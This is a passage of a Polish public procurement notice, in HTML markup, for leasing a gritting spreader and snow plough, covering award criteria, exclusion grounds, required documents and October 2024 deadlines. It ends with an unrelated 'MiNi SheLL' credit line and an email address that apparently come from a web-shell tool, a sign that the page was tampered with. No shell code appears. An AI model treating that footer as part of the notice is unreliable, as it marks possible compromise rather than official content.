Wykonawca będzie zobowiązany wskazać zakres podstawowych prac, które Zamawiający może Wykonać we własnym zakresie bez utraty gwarancji.<br/>7.7	Wykonawca zapewni w okresie pogwarancyjnym odpłatną dostępność części zamiennych oraz pełny odpłatny serwis pogwarancyjny przedmiotu zamówienia.<br/><br/>Wykonawca zobowiązany jest zapoznać się z zapisami umownymi i wymagania w nich zawarte również uwzględnić w cenie oferty. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">34144440-4 - Piaskarki</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">66114000-2 - Usługi leasingu finansowego</p> <p class="mb-0">43313100-1 - Pługi odśnieżające lemieszowe</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> 1. Leasing z opcją wykupu – ostatnia rata (36 rata) stanowi wykup na własność sprzętu pod warunkiem spłacenia wszelkich należności wynikających z umowy leasingu<br/>2. Wartość wykupu przedmiotu leasingu będzie wynosiła 1% ceny netto sprzętu wskazanej w ofercie Wykonawcy, powiększonej o należny podatek VAT, wyliczonej zgodnie z obowiązującą w dniu wykupu stawką VAT. <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">36 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Sposób oceny ofert szczegółowo określa SWZ</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">termin dostawy przedmiotu zamówienia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20,00</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres rękojmi i gwarancji jakości</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Zamawiający wzywa wykonawcę, którego oferta została najwyżej oceniona, do złożenia w wyznaczonym terminie, nie krótszym niż 5 dni od dnia wezwania, następujących podmiotowych środków:<br/>1)	w celu potwierdzenia braku podstaw wykluczenia wykonawcy z udziału w postępowaniu Zamawiający żąda przedłożenia oświadczenia wykonawcy o aktualności informacji zawartych w oświadczeniu, o którym mowa w art. 125 ust. 1 ustawy oraz w oświadczeniu o braku podstaw wykluczenia z postępowania na podstawie art. 7 ust. 1 ustawy z dnia 13 kwietnia 2022 r. o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego, w zakresie podstaw wykluczenia z postępowania wskazanych przez Zamawiającego w rozdziale IX SWZ - Załącznik nr 3 do SWZ.</span> </h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 1. Ofertę składa się na Formularzu Ofertowym – zgodnie z Załącznikiem nr 1 do SWZ. Wraz z ofertą Wykonawca jest<br/>zobowiązany złożyć:<br/>1) oświadczenia, o których mowa w Rozdziale X ust. 1 SWZ;<br/>2) dokumenty\informacje dotyczące zastosowania rozwiązań równoważnych (jeżeli dotyczy)<br/>3) dokumenty, z których wynika prawo do podpisania oferty; odpowiednie pełnomocnictwo (jeżeli dotyczy)- szczegóły<br/>określa SWZ.<br/>4) Wykonawca jest zobowiązany poinformować zamawiającego – wskazuje to w formularzu ofertowym lub odrębnym<br/>oświadczeniem(informację wykonawca załącza do oferty) - czy wybór oferty wykonawcy będzie prowadził do powstania u<br/>zamawiającego obowiązku podatkowego<br/>2. Z postępowania o udzielenie zamówienia wyklucza się Wykonawców, w stosunku do których zachodzi którakolwiek z<br/>okoliczności wskazanych wart. 7 ust. 1 ustawy z dnia 13 kwietnia 2022r o szczególnych rozwiązaniach w zakresie<br/>przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego (t.j. Dz. U. z 2024 r.<br/>poz. 507.). <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia publicznego. W takim przypadku Wykonawcy występujący wspólnie są zobowiązani do ustanowienia pełnomocnika do reprezentowania ich w postępowaniu albo do reprezentowania ich w postępowaniu i zawarcia umowy w sprawie przedmiotowego zamówienia publicznego. Wszelka korespondencja będzie prowadzona przez Zamawiającego wyłącznie z pełnomocnikiem. Pełnomocnictwo winno być załączone do oferty. <br/>2.	W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, oświadczenia, o których mowa w Rozdziale X ust. 1 SWZ, składa każdy z wykonawców. Oświadczenia te potwierdzają brak podstaw wykluczenia <br/>3. Oświadczenia i dokumenty potwierdzające brak podstaw do wykluczenia z postępowania składa każdy z Wykonawców wspólnie ubiegających się o zamówienie. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zamawiający przewiduje możliwość zmiany zawartej umowy w stosunku do treści wybranej oferty w zakresie uregulowanym w art. 455 Pzp oraz wskazanym w załączniku nr 4 do SWZ -Wymagania, które zostaną wpisane do umowy. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2024-10-18 10:30</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Ofertę wraz z wymaganymi dokumentami należy umieścić na platformazakupowa.pl pod adresem:https://platformazakupowa.pl/pn/zgkim_mszczonow.</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2024-10-18 11:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2024-11-16</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> 1.Szczegółowe informacje dotyczące środków ochrony prawnej określone są w Dziale IX „Środki ochrony prawnej” ustawy<br/>Pzp.<br/>2. Oferta, a także oświadczenie o jakim mowa w Rozdziale X ust. 1 SWZ oraz przedmiotowe środki dowodowe (jeżeli były<br/>wymagane) składane elektronicznie muszą zostać podpisane elektronicznym kwalifikowanym podpisem lub podpisem<br/>zaufanym lub podpisem osobistym. W procesie składania oferty, wniosku w tym przedmiotowych środków dowodowych na<br/>platformie, kwalifikowany podpis elektroniczny lub podpis zaufany lub podpis osobisty Wykonawca składa bezpośrednio na<br/>dokumencie, który następnie przesyła do systemu.<br/>3. Szczegółowa informacja w zakresie terminów realizacji przedmiotu zamówienia została określona w SWZ.<br/>4. Zamawiający nie dokonuje podziału zamówienia na części. Uzasadnienie: podział zamówienia na części nie ma uzasadnienia ekonomicznego. Niedokonanie podziału zamówienia na części nie spowoduje ograniczenia możliwości ubiegania się o zamówienie mniejszym podmiotom , w szczególności małym i średnim przedsiębiorstwom. Biorąc pod uwagę, że wartość zamawianego sprzętu nie jest duża podział zamówienia na małe części może spowodować niskie zainteresowanie tym zamówieniem nawet wśród wykonawców z sektora MŚP.<br/>Podział ilościowy dostaw groziłby nadmiernymi kosztami wykonania zamówienia, ze względu na utratę korzyści efektu skali. Efekt skali to obniżenie udziału kosztów stałych w kosztach jednostkowych dostawy w wyniku zwiększenia rozmiarów działalności. Przy zamówieniu na dostawę - bez rozbicia tej ilości na części - kalkulacja ceny jest korzystniejsza dla Zamawiającego. Podział zamówienia wskazuje na wysokie prawdopodobieństwo wzrostu cen, a to mogłoby zagrozić brakiem możliwości sfinansowania zamówienia przez Zamawiającego

Creat By MiNi SheLL
Email: jattceo@gmail.com